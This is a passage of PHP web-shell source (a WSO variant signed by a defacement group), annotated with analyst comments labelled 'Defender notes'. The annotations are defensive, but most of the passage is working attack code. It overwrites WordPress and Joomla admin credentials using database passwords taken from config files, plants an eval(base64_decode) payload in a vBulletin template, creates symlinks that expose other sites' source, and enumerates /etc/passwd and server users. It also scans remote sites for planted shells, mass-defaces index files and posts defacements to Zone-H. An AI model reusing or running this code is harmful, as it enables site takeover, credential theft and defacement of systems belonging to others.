 * $table_prefix by string splitting (nested helper enter()), and continues only
 * if the text matches /DB_NAME/i. It then connects to MySQL with the extracted
 * credentials, sets user_login and user_pass (MD5 of POST pass) on the ID = 1
 * row of {prefix}users, and prints the site URL (read from the literal table
 * `wp_options`), the new user name and the cleartext password.
 *
 * Defender notes: url is anything the web-server account can open, so a
 * wp-config.php of another site that this account can read (presumably through
 * a symlink, given the action name) exposes that site's database. Restrictive
 * permissions on wp-config.php and per-site OS users limit the reach. An
 * unsalted MD5 value in user_pass on the ID 1 account is an artifact to look for.
 *
 * NOTE(review): no closing brace for this function is visible before the next
 * `function` keyword in this paste - confirm against the full sample.
 */
1882function actionwpsym() {
1883wsoHeader();
1884if ($_POST['kill']) {
1885$url = $_POST['url'];
1886$user = $_POST['user'];$pass =$_POST['pass'];
1887$pss = md5($pass);
// enter() returns the text between the first occurrence of $a and the following $b.
1888function enter($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);
1889return $explode[0];}$config = file_get_contents($url);$password = enter($config,"define('DB_PASSWORD', '","');");
1890$username = enter($config,"define('DB_USER', '","');");$db = enter($config,"define('DB_NAME', '","');");$prefix = enter($config,'$table_prefix = \'',"';");$host = enter($config,"define('DB_HOST', '","');");if($config && preg_match('/DB_NAME/i',$config)){$conn= @mysql_connect($host,$username ,$password ) or die ("i can't connect to mysql, check your data");@mysql_select_db($db,$conn) or die (mysql_error());$grab = @mysql_query("SELECT * from `wp_options` WHERE option_name='home'");$data = @mysql_fetch_array($grab);$site_url = $data["option_value"];$query = mysql_query("UPDATE `".$prefix."users` SET `user_login` = '".$user."',`user_pass` = '".$pss."' WHERE `ID` = 1");if ($query) {echo '<center><h2 class="jijle3">Done !</h2></center><br><table width="100%"><tr><th width="20%">site</th><th width="20%">user</th><th with="20%">password</th><th width="20%">link</th></tr><tr><td width="20%"><font size="2" color="red">'.$site_url.'</font></td><td width="20%">'.$user.'</td><td with="20%">'.$pass.'</td><td width="20%"><a href="'.$site_url.'/wp-login.php"><font color="#00ff00">login</font></td></tr></table>';} else echo '<h2 class="jijle3"><font color="#ff0000">ERROR !</font></h2>';} else die('<center><h2 class="jijle3">Jijle3@phdz:~# This is Not WordPress Config !</h2>');} else { ?> <center><br><br><div class="mybox"><form method="post">
1891<h1 style='font-size:26px;' class='jijle3'>[ Wordpress Login changer From Config ]</h1>
1892<br>
1893<table><tr><td>Config File Link : </td><td>
1894<input size="26" class="inputz" type="text" name="url" value="">
1895</td></tr><tr><td>New User : </td><td>
1896<input class="inputz" type="text" name="user" size="26" value="jijle3"></td>
1897</tr><tr><td>New Pass : </td><td>
1898<input class="inputz" type="text" size="26" name="pass" value="jijle3"></td></tr><tr><td>
1899<br></td></tr><tr><td>
1900<input type="hidden" name="a" value="wpsym"><input class="inputzbut" type="submit" name="kill" value=" Change it Please "></td>
1901<br></tr></table></form></div>
1902</center><?php }
1903wsoFooter();
1904######################## joomla sym ############################
/**
 * Web-shell handler for action "jmsym" (a=jmsym): Joomla credential overwrite
 * driven by a configuration file.
 *
 * When POST field symjo is set it loads the text at POST url with
 * file_get_contents(), requires the string "JConfig" in it, extracts $password,
 * $user, $db, $dbprefix, $host, $mailfrom and $fromname by string splitting
 * (nested helper ex()), connects to MySQL with those values and runs one UPDATE
 * on {prefix}users that sets username, password (MD5 of POST pass),
 * usertype = 'Super Administrator' and block = 0.
 *
 * Defender notes: the UPDATE has no WHERE clause, so every account row ends up
 * with the same username and password hash - a strong indicator when reviewing
 * the users table. On a failed database selection the die() message prints the
 * extracted database user, password, host and name to the client. ereg() and
 * the mysql_* API were removed in PHP 7.0.
 */
1905function actionjmsym() {
1906wsoHeader();
1907{
1908if ($_POST['symjo']) {
// The "config link" is opened server-side with the web-server account's privileges.
1909$config = file_get_contents($_POST['url']);
1910$user = $_POST['user'];
1911$pass = md5($_POST['pass']);
// ex() returns the text between the first occurrence of $a and the following $b.
1912function ex($text,$a,$b){
1913$explode = explode($a,$text);
1914$explode = explode($b,$explode[1]);
1915return $explode[0];
1916}
1917if($config && ereg('JConfig',$config)){
1918$psswd = ex(
1919$config,'$password = \'',"';");
1920$username = ex($config,'$user = \'',"';");
1921$dbname = ex($config,'$db = \'',"';");
1922$prefix = ex($config,'$dbprefix = \'',"';");
1923$host = ex($config,'$host = \'',"';");
1924$email = ex($config,'$mailfrom = \'',"';");
1925$formn = ex($config,'$fromname = \'',"';");
1926$conn = mysql_connect($host,$username,$psswd) or die(mysql_error());mysql_select_db($dbname,$conn) or die($username.' '.$psswd.' '.$host.' '.$dbname);
// No WHERE clause: all rows of the users table are rewritten and unblocked.
1927$query = @mysql_query("UPDATE `".$prefix."users` SET `username` ='".$user."' , `password` = '".$pass."', `usertype` = 'Super Administrator', `block` = 0");
1928if ($query) {
1929echo '<center><h2 class="jijle3">Done !</h2></center><br><table width="100%"><tr><th width="30%">site name</th><th width="20%">user</th><th width="20%">password</th><th width="20%">email</th></tr><tr><td width="20%"><font size="2" color="red">'.$formn.'</font></td><td width="20%">'.$user.'</td><td with="20%">'.$_POST["pass"].'</td><td width="20%">'.$email.'</td></tr></table>';}else {echo '<h2 class="jijle3"><font color="#ff0000">ERROR !</font></h2>';}}else die('<h2 class="jijle3"><font color="#df5">Jijle3@phdz:~# This is Not Joomla Config . . <br><br> # i Will Drive if You Are Drunk !</font></h2>');
1930}
1931else {
1932?>
1933<center><br><br><div class="mybox">
1934<form method="post"><table>
1935<h1 class="jijle3">Joomla Login Changer From Config</h1>
1936<tr><td>config link : </td><td><input class="inputz" type="text" name="url" value=""></td></tr><tr><td>new user : </td><td><input class="inputz" type="text" name="user" value="admin"></td></tr><tr><td>new password : </td><td><input class="inputz" type="text" name="pass" value="123123"></td></tr><tr><td><br></td></tr><tr><td><input type="hidden" name="a" value="jmsym"><input type="submit" class="inputzbut" name="symjo" value="change"></td><br></tr></table></form></div></center><?php }}
1937wsoFooter(); }
1938######################## joomla key ############################
/**
 * Web-shell handler for action "jmkey" (a=jmkey): Joomla admin credential overwrite.
 *
 * With POST field pwd empty it only prints a form. Otherwise it connects to
 * MySQL with operator-supplied host, database, user and password and runs two
 * UPDATEs on {prefix}users, setting username and password (MD5 of pwd) on rows
 * where name is 'Super User' or 'Super Utilisateur', or id is '62'.
 *
 * Defender notes: look for a changed username and an unsalted 32-hex-character
 * password value on the rows matched by that WHERE clause. POST values are
 * concatenated into the SQL text unescaped, and MySQL error text is returned to
 * the client through die(mysql_error()).
 */
1939function actionjmkey() {
1940wsoHeader();
1941{
1942if(empty($_POST['pwd']))
1943{
1944echo "<br><br><br><center><div class='mybox'><h1>Joomla login changer</h1><FORM method='POST'><br><br><br>DB_Prefix : <INPUT class ='inputz' size='8' value='jos_' name='prefix' type='text'> host :
1945<INPUT class ='inputz' size='10' value='localhost' name='localhost' type='text'> database : <INPUT class ='inputz' size='10' value='database' name='database' type='text'> username : <INPUT class ='inputz' size='10' value='db_user' name='username' type='text'> password : <INPUT class ='inputz' size='10' value='db_pass' name='password' type='text'><br> <br>New Username: <INPUT class ='inputz' name='admin' size='15' value='jijle3'><br><br>New Password: <INPUT class ='inputz' name='pwd' size='15' value='123123'><br><br> <input type='hidden' name='a' value='jmkey'><INPUT value='change' class='inputzbut' name='send' type='submit'></FORM></div></center>";
1946}
1947else {$prefix = $_POST['prefix'];
1948$localhost = $_POST['localhost'];
1949$database = $_POST['database'];
1950$username = $_POST['username'];
1951$password = $_POST['password'];
1952$admin = $_POST['admin'];
1953$pd = ($_POST["pwd"]);
// The new password is stored as a plain MD5 digest.
1954$pwd = md5($pd);@mysql_connect(
1955$localhost,$username,$password) or die (mysql_error());
1956@mysql_select_db($database) or die (mysql_error());
// Rows are selected by display name or by the literal id '62'.
1957$SQL=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());
1958$SQL=@mysql_query("UPDATE ".$prefix."users SET password ='".$pwd."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());
1959if($SQL) echo "<br><br><center><h1>Password Changed ! ... Go and login</h1></center>";}}
1960wsoFooter(); }
1961######################## vb index ######################
/**
 * Web-shell handler for action "vbindex" (a=vbindex): forum home template overwrite.
 *
 * With POST field index empty it only prints a form. Otherwise it connects to
 * MySQL with operator-supplied credentials and replaces the `template` column
 * of the row titled 'FORUMHOME' in {perfix}template with a string of the form
 * {${eval(base64_decode('...'))}}{${exit()}}, where the Base64 payload is an
 * `echo` of the operator's markup.
 *
 * Defender notes: the stored value contains PHP that presumably executes when
 * the forum renders that template, so this is stored code execution rather
 * than a content change only. Searching the template table for
 * "eval(base64_decode" and comparing FORUMHOME against a known-good copy are
 * the direct checks.
 */
1962function actionvbindex() {
1963wsoHeader();
1964{
1965if(empty($_POST['index']))
1966{
1967echo "<center><br><br><div width='100%' class='mybox'><br><h1 class='jijle3'>Vbulletin index changer</h1>
1968<br><FORM method='POST'>host : <INPUT size='12' class='inputz' value='localhost' name='localhost' type='text'> | database : <INPUT class='inputz' size='12' value='db_name' name='database' type='text'> | username : <INPUT class='inputz' size='10' value='db_user' name='username' type='text'> | password : <INPUT class='inputz' size='10' value='bd_pass' name='password' type='text'> | perfix : <input class='inputz' size='10' value='' name='perfix' type='text'><br><br><textarea class='inputz' name='index' cols='40' rows='10'>
1969<br><center>Hacked By Phenomene Dz <br><center>[ Martyrs Crew ]<br>#Algerian Hacker <br><center>#Free Pilastine <br><center>#www.fb.com/J1jeI
1970</textarea><br><input type='hidden' name='a' value='vbindex'><INPUT class='inputzbut' value='Deface' name='send' type='submit'></FORM></div></center>";
1971}
1972else{$localhost = $_POST['localhost'];
1973$database = $_POST['database'];
1974$username = $_POST['username'];
1975$password = $_POST['password'];
1976$perfix = $_POST['perfix'];
1977$index = $_POST['index'];
1978@mysql_connect($localhost,$username,$password) or die(mysql_error());
1979@mysql_select_db($database) or die(mysql_error());
// The template value is assembled as an eval(base64_decode(...)) expression followed by exit().
1980$index=str_replace("\'","'",$index);$set_index = "{\${eval(base64_decode(\'";
1981$set_index .= base64_encode("echo '$index';");
1982$set_index .= "\'))}}{\${exit()}}</textarea>";
1983$ok=@mysql_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());
1984if($ok){echo "Hamd Li Allah . . . Vb Forum Has Been DEFACED ! <br><br>";
1985}}}
1986wsoFooter(); }
1987####################### {Smylink } ##############################
/**
 * Web-shell handler for action "sym" (a=sym): exposes an arbitrary path through
 * a symlink inside the web root.
 *
 * When POST field symlink is set it creates the directory "phdzsymF" (mode
 * 0755) relative to the current working directory, writes a .htaccess there
 * that enables Indexes and FollowSymLinks and maps .php and .html to type
 * "txt", then symlinks POST file to phdzsymF/<POST symfile> and prints a link
 * to it.
 *
 * Defender notes: on-disk indicators are a directory named "phdzsymF", its
 * .htaccess with the directives below, and symlinks whose targets lie outside
 * the site. Serving .php as text discloses source such as configuration files
 * of other accounts. Apache's SymLinksIfOwnerMatch, a restricted AllowOverride
 * and listing symlink in PHP's disable_functions each remove a step this
 * handler relies on. All filesystem calls are @-suppressed, so failures are
 * silent.
 */
1988function actionsym() {
1989wsoHeader();
1990//Symlinker
1991echo'
1992<center>
1993<h1>File Symlink</h1>
1994<br /><br />
1995<form method="post">
1996<input type="hidden" name="a" value="sym">
1997<input type="text" name="file" value="/var/www/" size="50"/><br /><br />
1998<input type="text" name="symfile" value="algeria.txt" size="50"/><br /><br />
1999<input type="submit" value="symlink" name="symlink" /> <br /><br />
2000</form>
2001';
2002$pfile = $_POST['file'];
2003$symfile = $_POST['symfile'];
2004$symlink = $_POST['symlink'];
2005if ($symlink)
2006{
2007@mkdir('phdzsymF',0755);
// .htaccess content: directory listing, symlink following, and .php/.html served as text.
2008$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
2009$f =@fopen ('phdzsymF/.htaccess','w');
2010@fwrite($f , $c);
// Both the link target and the link name are taken from the request unvalidated.
2011@symlink("$pfile","phdzsymF/$symfile");
2012echo '<br /><a target="_blank" href="phdzsymF/'.$symfile.'" >'.$symfile.'</a>';
2013}
2014?></center><?php
2015wsoFooter();}
2016
2017
2018################ Etc/pwd ####################
/**
 * Web-shell handler for action "etcbaypass": local account enumeration.
 *
 * Prints five forms and, depending on which submit field is present in the
 * POST body (syst, passth, ex, shex, dz), reads /etc/passwd through system(),
 * passthru(), exec() or shell_exec() running "cat /etc/passwd", or walks UIDs
 * 0..59999 with posix_getpwuid() and prints every field of each entry found.
 *
 * Defender notes: the five variants exist so that at least one still works
 * when some functions are listed in disable_functions; the posix_getpwuid()
 * loop needs no shell and no file read. Process auditing that flags the
 * web-server account spawning "cat /etc/passwd" covers the first four
 * variants; the fifth leaves no child process. The commands are fixed strings,
 * no request data reaches the shell here.
 */
2019function actionetcbaypass() {
2020wsoHeader();
2021//etc passwd
2022?></center><?php
2023echo '<br><center><h1>Etc Passwd Bypasser</h1><br>[ Bism Allah ]<center><br><br>';
2024echo '
2025<form method="post">
2026<input type="submit" value="Use [ System ] Function" name="syst">
2027<input type="hidden" name="a" value="etcbaypass">
2028</form>
2029</center><br>
2030</p>
2031
2032
2033<form method="post">
2034<font face="Tahoma" color="#007700" size="2pt">
2035<input type="submit" value="Use [ PassThru ] Function" name="passth">
2036<input type="hidden" name="a" value="etcbaypass">
2037</form>
2038</center><br>
2039</p>
2040
2041<p><center>
2042<form method="post">
2043<input type="submit" value="Use [ Exec ] Function" name="ex">
2044<input type="hidden" name="a" value="etcbaypass">
2045</form>
2046</center><br>
2047</p>
2048
2049<p><center>
2050<form method="post">
2051<input type="submit" value="Use [ Sh Exec ] Function" name="shex">
2052<input type="hidden" name="a" value="etcbaypass">
2053</form>
2054</center><br>
2055</p>
2056
2057<p><center>
2058<form method="post">
2059<input type="submit" value="Use [ Posix Getpwuid ] Function" name="dz">
2060<input type="hidden" name="a" value="etcbaypas">
2061</form>
2062</center><br>
2063</p>
2064
2065<center>';
2066
2067
2068//System Function //
2069if($_POST['syst'])
2070{
2071
2072echo"<textarea class='area' cols='65' rows='15'>";
2073echo system("cat /etc/passwd");
2074echo"</textarea><br>";
2075echo"
2076<br>
2077<b>
2078</b>
2079<br>
2080";
2081}
2082echo '
2083</center>
2084<center>';
2085
2086
2087
2088//Passthru Function //
2089if($_POST['passth'])
2090{
2091echo"<textarea class='area' cols='65' rows='15'>";
2092echo passthru("cat /etc/passwd");
2093echo"</textarea><br>";
2094echo"
2095<br>
2096<b>
2097
2098</b>
2099<br>
2100";
2101
2102}
2103
2104
2105echo '
2106</center>
2107<center>';
2108
2109
2110
2111//exec Function //
2112if($_POST['ex'])
2113{
2114echo"<textarea class='area' cols='65' rows='15'>";
2115echo exec("cat /etc/passwd");
2116echo"</textarea><br>";
2117echo"
2118<br>
2119<b>
2120</b>
2121<br>
2122";
2123}
2124
2125
2126echo '
2127</center>
2128<center>';
2129
2130
2131//shell_exec Function //
2132if($_POST['shex'])
2133{
2134echo"<textarea class='area' cols='65' rows='15'>";
2135echo shell_exec("cat /etc/passwd");
2136echo"</textarea><br>";
2137echo"
2138<br>
2139<b>
2140</b>
2141<br>
2142";
2143}
2144echo '</center>
2145<center>';
2146
2147
2148
2149//posix_getpwuid Function //
2150if($_POST['dz'])
2151{
2152echo"<textarea class='area' cols='65' rows='15'>";
// Iterates UIDs 0..59999 and prints each account record as colon-separated fields.
2153for($uid=0;$uid<60000;$uid++){
2154$ara = posix_getpwuid($uid);
2155if (!empty($ara)) {
2156while (list ($key, $val) = each($ara)){
2157print "$val:";
2158}
2159print "\n";
2160}
2161}
2162echo"</textarea><br>";
2163echo"
2164<br>
2165<b>
2166</b>
2167<br>
2168";
2169}
2170?></center><?php
2171wsoFooter();}
2172################################## Server User ##############################
/**
 * Web-shell handler for action "etcnmd": lists local user names.
 *
 * Prints five forms and, depending on which submit field is present in the
 * POST body (awk, syst, passth, ex, shex), either extracts the first field of
 * /etc/passwd with awk and sorts it, or lists /var/mail through system(),
 * passthru(), exec() or shell_exec().
 *
 * Defender notes: listing /var/mail yields account names without reading
 * /etc/passwd, so restricting that file alone does not stop the enumeration.
 * Child processes "awk" or "ls /var/mail" owned by the web-server account are
 * the runtime indicator. The commands are fixed strings; no request data
 * reaches the shell here.
 */
2173function actionetcnmd() {
2174wsoHeader();
2175echo '<br><center><h1>Server User Bypasser</h1><br>[ Bism Allah ]<center><br><br>';
2176echo '
2177<div class="tul"><font color="ee5500" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">
2178
2179<p><center>
2180<form method="post">
2181<input type="submit" value="Use [ AWK Programe ] Function" name="awk">
2182<input type="hidden" name="a" value="etcnmd">
2183</form>
2184</center><br>
2185</p>
2186
2187
2188<p><center>
2189<form method="post">
2190<input type="submit" value="Use [ Systeme ] Function" name="syst">
2191<input type="hidden" name="a" value="etcnmd">
2192</form>
2193</center><br>
2194</p>
2195
2196<p><center>
2197<form method="post">
2198<input type="submit" value="Use [ Passthru ] Function" name="passth">
2199<input type="hidden" name="a" value="etcnmd">
2200</form>
2201</center><br>
2202</p>
2203
2204<p><center>
2205<form method="post">
2206<input type="submit" value="Use [ Exec ] Function" name="ex">
2207<input type="hidden" name="a" value="etcnmd">
2208</form>
2209</center><br>
2210</p>
2211
2212<p><center>
2213<form method="post">
2214<input type="submit" value="Use [ Sh Exec ] Function" name="shex">
2215<input type="hidden" name="a" value="etcnmd">
2216</form>
2217</center><br>
2218</p><center>';
2219
2220
2221//Awk Program //
2222if ($_POST['awk']) {
2223echo"<textarea class='area' cols='65' rows='15'>";
2224echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
2225echo "</textarea><br>";
2226echo "
2227<br>
2228<b>
2229</b>
2230<br>
2231";
2232}
2233echo "</center><center>";
2234
2235//System Function //
2236if ($_POST['syst']) {
2237echo"<textarea class='area' cols='65' rows='15'>";
2238echo system("ls /var/mail");
2239echo "</textarea><br>";
2240echo "
2241<br>
2242<b>
2243</b>
2244<br>
2245";
2246}
2247
2248echo "</center><center>";
2249
2250//Passthru Function //
2251if ($_POST['passth']) {
2252echo"<textarea class='area' cols='65' rows='15'>";
2253echo passthru("ls /var/mail");
2254echo "</textarea><br>";
2255echo "
2256<br>
2257<b>
2258</b>
2259<br>
2260";
2261}
2262echo "</center><center>";
2263
2264//exec Function //
2265if ($_POST['ex']) {
2266echo"<textarea class='area' cols='65' rows='15'>";
2267echo exec("ls /var/mail");
2268echo "</textarea><br>";
2269echo "
2270<br>
2271<b>
2272
2273</b>
2274<br>
2275";
2276}
2277
2278echo "</center><center>";
2279
2280//shell_exec Function //
2281if ($_POST['shex']) {
2282echo"<textarea class='area' cols='65' rows='15'>";
2283echo shell_exec("ls /var/mail");
2284echo "</textarea><br>";
2285echo "
2286<br>
2287<b>
2288</b>
2289<br>
2290";
2291}
2292?></center><?php
2293wsoFooter();}
2294##################### Shell Finder ####################
/**
 * Web-shell handler for action "shellfind": probes a remote site for known
 * web-shell and backup file names.
 *
 * When POST field scan is set it takes the base URL from POST traget, appends
 * each entry of a hard-coded list of file and directory names, requests the
 * result with get_headers(), and prints the URLs whose status line contains
 * "200". set_time_limit(0) removes the execution time limit for the request.
 *
 * Defender notes: the requests originate from the compromised host, so its
 * egress logs show a burst of HTTP requests to one target using the paths
 * below, and the target sees the compromised host as the scanner. Egress
 * filtering for the web-server account limits this. The name list is equally
 * usable as a hunting list against one's own document roots. The reflected URL
 * is echoed into the page unescaped.
 */
2295function actionshellfind() {
2296wsoHeader();
2297echo'<center>
2298<center><h1>Shell Finder<h1><br>
2299<p align="center"></p><br>
2300<form method="POST">
2301</form><center>
2302<form action="" method="post">
2303<input name="traget" type="text" size="100" value="http://www.site.co.il/"/><br>
2304<input type="hidden" name="a" value="shellfind">
2305<br><br>
2306<input name="scan" size="100" value="Start Scaning" type="submit">
2307</form><br>';
2308
2309set_time_limit(0);
2310
2311if (isset($_POST["scan"])) {
2312
2313$url = $_POST['traget'];
2314
2315echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
2316
// Hard-coded candidate names: web shells, archive and SQL backups, plugin and template paths.
2317$shells = array("WSO.php","shell.php","3xd.php","dz.php","priv8.php","sniper.php","dhanush shell.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
2318"x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
2319"Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
2320"vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
2321"d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
2322"wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
2323"wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
2324"tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
2325"tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
2326"whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
2327"templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
2328"admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
2329"/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
2330"/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
2331"/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
2332"/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
2333"/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
2334"wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
2335"tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/","ma.php", "tn.php", "wso.php.html", "shell.php", "dhanush.php",
2336"tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
2337"forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
2338"spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
2339"Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
2340"tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
2341"/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip");
2342
2343//Start Scan
// One outbound request per list entry; a hit is any status line containing "200".
2344foreach ($shells as $shell){
2345$headers = get_headers("$url$shell"); //
2346
2347if (eregi('200', $headers[0])) {
2348//Result
2349echo "<a href='$url$shell'>$url$shell</a> <span class='found'</span><br /><br/><br/>"; //
2350}
2351}
2352}
2353?></center><?php
2354wsoFooter();}
2355######################### Domains #########################
/**
 * Web-shell handler for action "domains": maps hosted domains to local users.
 *
 * Reads /etc/named.conf, collects every name matching "named/<name>.db",
 * de-duplicates the list, and for each domain prints the owner of
 * /etc/valiases/<domain> as resolved by posix_getpwuid(fileowner(...)).
 * Execution stops with die() when the file cannot be read or is empty.
 *
 * Defender notes: the handler works only when the web-server account can read
 * /etc/named.conf and stat files under /etc/valiases (a layout that appears to
 * be that of a shared-hosting control panel - confirm for the host in
 * question). Tightening read access to both removes this mapping of sites to
 * accounts. Domain names are echoed into the page unescaped.
 */
2356function actiondomains() {
2357wsoHeader();
2358echo '<center><h1>Server Domain</h1>';
2359$file = @implode(@file("/etc/named.conf"));
2360if(!$file){ die(" [/etc/named.conf] Not Writeable ! "); }
// Zone file references of the form named/<domain>.db supply the domain list.
2361preg_match_all("#named/(.*?).db#",$file ,$r);
2362$domains = array_unique($r[1]);
2363//check();
2364//if(isset($_GET['ShowAll']))
2365{
2366echo "<table align=center border=1 width=59% cellpadding=5>
2367<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
2368<tr><td>Domain</td><td>User</td></tr>";
2369foreach($domains as $domain){
// File ownership of the per-domain alias file is used to name the owning account.
2370$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
2371 echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
2372 }
2373 echo "</table>";
2374 }
2375echo '</div>';
2376wsoFooter(); }
2377######################### Mass Deface #########################
/**
 * Web-shell handler for action "mass": overwrites index.html in every
 * subdirectory of a chosen directory.
 *
 * Prints a form, then reads POST massdefacedir and massdefaceurl. If the
 * directory exists it iterates its entries and, for each entry whose type is
 * "dir", copies the source named by massdefaceurl to <dir><entry>/index.html,
 * echoing each destination path and a failure message when copy() fails.
 *
 * Defender notes: the result is many index.html files with identical content
 * and near-identical modification times across sibling directories, which
 * file-integrity monitoring or a hash sweep surfaces quickly. The readdir()
 * loop does not exclude "." and "..", so the chosen directory and its parent
 * are written as well. The copy source may be remote when allow_url_fopen is
 * enabled - confirm the host's setting. Write access is bounded by what the
 * web-server account can write.
 */
2378function actionmass(){
2379wsoHeader();
2380?>
2381<head>
2382<center>
2383<span style="font-weight: 700;" class="style33">
2384 <h1>Folders Mass Defacer</h1></span></span></span><BR>
2385 </div>
2386<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
2387<div class="style31"><center>
2388<span>Directory : </span><br><input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'><BR><br>
2389<span>index Url : </span><br><input type='text' style='width: 250px' name='massdefaceurl'>
2390 </form></td>
2391<p class="style3">
2392<input type="hidden" name="a" value="mass"><input type='submit' name='execmassdeface' value='>>'></div>
2393<center><span>Rusult : <span>
2394<span <ul>
2395 <span class="style32">
2396 <span class="style39">
2397 </span></p>
2398<span style="font-weight: 700;" class="style33">
2399 <font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);">
2400</center>
2401<div class="style31">
2402<html>
2403<?php
2404echo "<center><textarea rows='10' cols='100'>ph@dz:~# Jijle3 Mass Defacer | ";
// Source and destination root both come from the POST body; this code runs on every request to the action.
2405$defaceurl = $_POST['massdefaceurl'];
2406$dir = $_POST['massdefacedir'];
2407echo $dir."\n";
2408if (is_dir($dir)) {
2409 if ($dh = opendir($dir)) {
2410 while (($file = readdir($dh)) !== false) {
2411 if(filetype($dir.$file)=="dir"){
2412 $newfile=$dir.$file."/index.html";
2413 echo $newfile."\n";
2414 if (!copy($defaceurl, $newfile)) {
2415 echo "ph@dz:~# Faild To Copy ! >> $file...";
2416 }
2417 }
2418 }
2419 closedir($dh);
2420 }
2421}
2422echo "</textarea></center>";
2423wsoFooter(); }
2424############## Domain #####################
/**
 * Web-shell handler for action "Domain": second copy of the domain-to-user
 * listing, with the same logic as actiondomains() in this file.
 *
 * Reads /etc/named.conf, collects every name matching "named/<name>.db",
 * de-duplicates the list, and prints each domain next to the owner of
 * /etc/valiases/<domain> resolved through posix_getpwuid(fileowner(...)).
 * It opens the page with printHeader() rather than wsoHeader(); that helper is
 * not defined in the visible part of the file.
 *
 * Defender notes: same exposure as actiondomains() - restricting read access
 * to /etc/named.conf and /etc/valiases for the web-server account removes the
 * data source.
 */
2425function actionDomain(){
2426printHeader();
2427echo '<h1>local domain viewer</h1><div class=content>';
2428$file = @implode(@file("/etc/named.conf"));
2429if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
2430preg_match_all("#named/(.*?).db#",$file ,$r);
2431$domains = array_unique($r[1]);
2432//check();
2433//if(isset($_GET['ShowAll']))
2434{
2435echo "<table align=center border=1 width=59% cellpadding=5>
2436<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
2437<tr><td>Domain</td><td>User</td></tr>";
2438foreach($domains as $domain){
2439$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
2440 echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
2441 }
2442 echo "</table>";
2443 }
2444echo '</div>';
2445wsoFooter();
2446}
2447######################### Zone-h ############################
/**
 * Web-shell handler for action "zoneh": submits a list of sites to a
 * defacement archive.
 *
 * Prints a form, checks that the curl extension is loaded, reads POST defacer,
 * hackmode, reason and domain, splits domain on newlines, prefixes entries
 * that do not start with "http", and calls ZoneH() once per entry with the
 * endpoint http://zone-h.org/notify/single. ZoneH() is defined outside the
 * visible part of the file; presumably it performs the HTTP POST - confirm
 * against the full sample.
 *
 * Defender notes: outbound HTTP from the web-server account to zone-h.org is
 * the network indicator. The submitted site list can name systems other than
 * the compromised host, so it is worth recovering from request bodies when
 * they are logged. The die() calls run on any request to this action that
 * lacks the expected fields.
 */
2448function actionzoneh() {
2449wsoHeader();
2450{
2451?>
2452<br><br><center>
2453<!-- Zone-H -->
2454<form action="" method='POST'><table><table class='tabnet'><tr>
2455<center>
2456<h1>Zone-H Mass Poster</h1>
2457<br /><br />
